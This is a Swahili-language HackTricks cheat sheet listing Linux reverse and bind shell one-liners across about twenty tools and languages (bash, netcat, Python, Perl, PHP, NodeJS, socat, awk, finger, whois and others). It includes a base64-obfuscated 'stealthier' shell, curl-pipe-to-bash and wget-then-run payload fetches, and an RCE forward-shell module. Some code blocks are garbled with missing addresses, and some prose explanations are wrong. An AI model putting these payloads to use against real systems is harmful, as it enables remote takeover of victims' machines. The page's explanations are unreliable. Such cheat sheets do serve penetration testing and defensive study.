# Mabakuli - Linux
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
**Kikundi cha Usalama cha Try Hard**
{% embed url="https://discord.gg/tryhardsecurity" %} *** **Ikiwa una maswali kuhusu mabakuli haya unaweza kuyachunguza kwa** [**https://explainshell.com/**](https://explainshell.com) ## TTY Kamili **Maranyingi unapopata bakuli la kurudi**[ **soma ukurasa huu ili upate TTY kamili**](full-ttys.md)**.** ## Bash | sh ```bash curl https://reverse-shell.sh/1.1.1.1:3000 | bash bash -i >& /dev/tcp// 0>&1 bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done #Short and bypass (credits to Dikline) (sh)0>/dev/tcp/10.10.10.10/9091 #after getting the previous shell to get the output to execute exec >&0 ``` Usisahau kuangalia na mabaka mengine: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, na bash. ### Baka Salama ya Alama ```bash #If you need a more stable connection do: bash -c 'bash -i >& /dev/tcp// 0>&1' #Stealthier method #B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0 echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null ``` #### Maelezo ya Shell 1. **`bash -i`**: Sehemu hii ya amri inaanza kiendeshaji cha Bash cha mwingiliano (`-i`). 2. **`>&`**: Sehemu hii ya amri ni maelezo ya mkato kwa **kupelekeza pato la kawaida** (`stdout`) na **makosa ya kawaida** (`stderr`) kwa **mahali sawa**. 3. **`/dev/tcp//`**: Hii ni faili maalum inayowakilisha **unganisho la TCP kwa anwani ya IP iliyotajwa na bandari**. * Kwa **kupelekeza mito ya pato na makosa kwa faili hii**, amri inatuma kimsingi pato la kikao cha kiendeshaji cha mwingiliano kwenye mashine ya mshambuliaji. 4. **`0>&1`**: Sehemu hii ya amri **inapelekeza kuingia kawaida (`stdin`) kwa marudio sawa na pato la kawaida (`stdout`)**. ### Unda kwenye faili na tekeleza ```bash echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh; wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh ``` ## Shell ya Mbele Wakati unashughulika na udhaifu wa **Remote Code Execution (RCE)** ndani ya programu ya wavuti inayotumia Linux, kufanikisha shell ya nyuma kunaweza kuzuiliwa na ulinzi wa mtandao kama sheria za iptables au mifumo ya kuchuja pakiti yenye utata. Katika mazingira hayo yaliyozuiwa, njia mbadala inahusisha kuanzisha shell ya PTY (Pseudo Terminal) ili kuingiliana na mfumo uliokumbwa na shida kwa ufanisi zaidi. Zana iliyopendekezwa kwa kusudi hili ni [toboggan](https://github.com/n3rada/toboggan.git), ambayo inasaidia kuingiliana na mazingira lengwa. Kutumia toboggan kwa ufanisi, tengeneza moduli ya Python iliyobinafsishwa kwa muktadha wa RCE wa mfumo wako lengwa. Kwa mfano, moduli iliyoitwa `nix.py` inaweza kuwa na muundo ufuatao: ```python3 import jwt import httpx def execute(command: str, timeout: float = None) -> str: # Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution token = jwt.encode( {"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256" ) response = httpx.get( url="https://vulnerable.io:3200", headers={"Authorization": f"Bearer {token}"}, timeout=timeout, # ||BURP|| verify=False, ) # Check if the request was successful response.raise_for_status() return response.text ``` Na kisha, unaweza kukimbia: ```shell toboggan -m nix.py -i ``` Kutumia kabisa ganda la kuingiliana moja kwa moja. Unaweza kuongeza `-b` kwa ushirikiano wa Burpsuite na kuondoa `-i` kwa ganda la rce la msingi zaidi. Njia nyingine ni kutumia utekelezaji wa ganda la mbele la `IppSec` [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell). Unahitaji kubadilisha tu: * URL ya mwenyeji mwenye kasoro * Kiambishi na kielezo cha mzigo wako (ikiwa ipo) * Namna mzigo unavyotumwa (vichwa? data? habari ziada?) Kisha, unaweza tu **kutuma amri** au hata **kutumia amri ya `upgrade`** kupata PTY kamili (kumbuka kuwa mabomba hufanyiwa kusoma na kuandika kwa kuchelewa kwa takriban sekunde 1.3). ## Netcat ```bash nc -e /bin/sh nc | /bin/sh #Blind rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f nc | /bin/bash | nc rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe ``` ## gsocket Angalia kwenye [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) ```bash bash -c "$(curl -fsSL gsocket.io/x)" ``` ## Telnet Telnet ni itifaki ya mtandao inayotumiwa kwa mawasiliano kwenye mtandao. Inaweza kutumika kwa kuingia kwa mbali kwenye mfumo wa kompyuta au kifaa kingine kwa kutumia barua pepe. ```bash telnet | /bin/sh #Blind rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f telnet | /bin/bash | telnet rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe ``` ## Whois **Mshambuliaji** ```bash while true; do nc -l ; done ``` Kutuma amri andika chini, bonyeza 'enter' na bonyeza CTRL+D (kusimamisha STDIN) **Mnajisi** ```bash export X=Connected; while true; do X=`eval $(whois -h -p "Output: $X")`; sleep 1; done ``` ## Python ```bash #Linux export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' #IPv6 python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' ``` ## Perl Perl ni lugha ya programu ambayo inaweza kutumika kwa ufanisi kama shellcode kwenye mifumo ya Linux. Inaweza kutumika kwa kuchora sockets, kusoma na kuandika faili, na kufanya shughuli zingine za mfumo. Perl inaweza kuwa chaguo nzuri kwa kuandika shellcode kwa sababu ya uwezo wake wa kufanya kazi na strings na pointers kwa urahisi. ```bash perl -e 'use Socket;$i="";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` ## Ruby ```bash ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` ## PHP PHP ni lugha ya programu inayotumika sana kwa maendeleo ya wavuti. Inaweza kutumika kwa kujenga programu za seva zinazoweza kutekeleza amri za mfumo wa uendeshaji. Kwa kawaida, PHP inaweza kutekeleza amri za mfumo wa uendeshaji kwa kutumia shell_exec, exec, system, passthru, popen, proc_open, pcntl_exec, backticks, na shell functions. Kwa hivyo, PHP inaweza kutumika kama sehemu ya mnyororo wa shambulio la kuingilia kati kwa kutekeleza amri za mfumo wa uendeshaji. ```php // Using 'exec' is the most common method, but assumes that the file descriptor will be 3. // Using this method may lead to instances where the connection reaches out to the listener and then closes. php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' // Using 'proc_open' makes no assumptions about what the file descriptor will be. // See https://security.stackexchange.com/a/198944 for more information $sock, 1=>$sock, 2=>$sock), $pipes); ?> /dev/tcp/10.10.14.8/4444 0>&1'"); ?> ``` ## Java ```bash r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` ## Ncat ```bash victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl attacker> ncat -v 10.0.0.22 4444 --ssl ``` ## Golang Golang ni lugha ya programu iliyoundwa na Google. Inajulikana kwa ufanisi wake na urahisi wa matumizi. ```bash echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go ``` ## Lua ## Lua ```bash #Linux lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" #Windows & Linux lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ## NodeJS ```javascript (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(8080, "10.17.26.64", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })(); or require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'") or -var x = global.process.mainModule.require -x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') or // If you get to the constructor of a function you can define and execute another function inside a string "".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() "".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() or // Abuse this syntax to get a reverse shell var fs = this.process.binding('fs'); var fs = process.binding('fs'); or https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py ``` ## OpenSSL Mshambuliaji (Kali) ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response ``` ### Mzigo Kwa kawaida, unataka kudumisha upatikanaji wa shell kwenye mfumo wa kompyuta ya mwathiriwa. Kwa kufanya hivyo, unaweza kutekeleza hatua zaidi za mashambulizi. Kuna njia kadhaa za kupata shell kwenye mfumo wa mwathiriwa, ikiwa ni pamoja na: - **Reverse Shells**: Hizi ni aina za shell ambazo zinawezesha kompyuta ya mwathiriwa kuungana na kompyuta yako, badala ya kinyume chake. - **Web Shells**: Hizi ni programu ndogo zilizowekwa kwenye seva ya wavuti ambazo zinaweza kutumiwa kudhibiti mfumo wa kompyuta ya mwathiriwa kupitia kivinjari cha wavuti. - **Local Shells**: Hizi ni aina za shell ambazo zinapatikana moja kwa moja kwenye kompyuta ya mwathiriwa, mara nyingi kupitia udhibiti wa mbali. Kila aina ya shell ina faida zake na inaweza kutumiwa kulingana na mazingira na malengo ya mashambulizi yako. ```bash #Linux openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : #Windows openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : ``` ## **Socat** [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) ### Bind shell ## **Socat** [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) ### Bind shell ```bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 ``` ### Reverse shell ### Kitanzi cha Nyuma ```bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane ``` ## Awk ```bash awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null ``` ## Kidole **Mshambuliaji** ```bash while true; do nc -l 79; done ``` Kutuma amri andika chini, bonyeza 'enter' na bonyeza CTRL+D (kukomesha STDIN) **Mnajisi** ```bash export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null')`; sleep 1; done export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done ``` ## Gawk Gawk ni programu ya kutumia lugha ya Awk. Inaweza kutumika kama sehemu ya mnyororo wa zana za kufanya uchambuzi wa data kwenye mifumo ya Unix. Gawk inaweza kutumika kwa urahisi kwenye mstari wa amri kusaidia katika kuchuja, kuchambua, na kuchakata data kwa njia ya kiotomatiki. ```bash #!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } } ``` ## Xterm Hii itajaribu kuunganisha kwenye mfumo wako kwenye bandari 6001: ```bash xterm -display 10.0.0.1:1 ``` Kupata reverse shell unaweza kutumia (ambayo itasikiliza kwenye bandari 6001): ```bash # Authorize host xhost +targetip # Listen Xnest :1 ``` ## Groovy na [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) TAARIFA: Java reverse shell pia inafanya kazi kwa Groovy ```bash String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ## Marejeo * [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) * [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell) * [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/) * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) **Kikundi cha Usalama cha Try Hard**
{% embed url="https://discord.gg/tryhardsecurity" %}
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJISAJILI**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.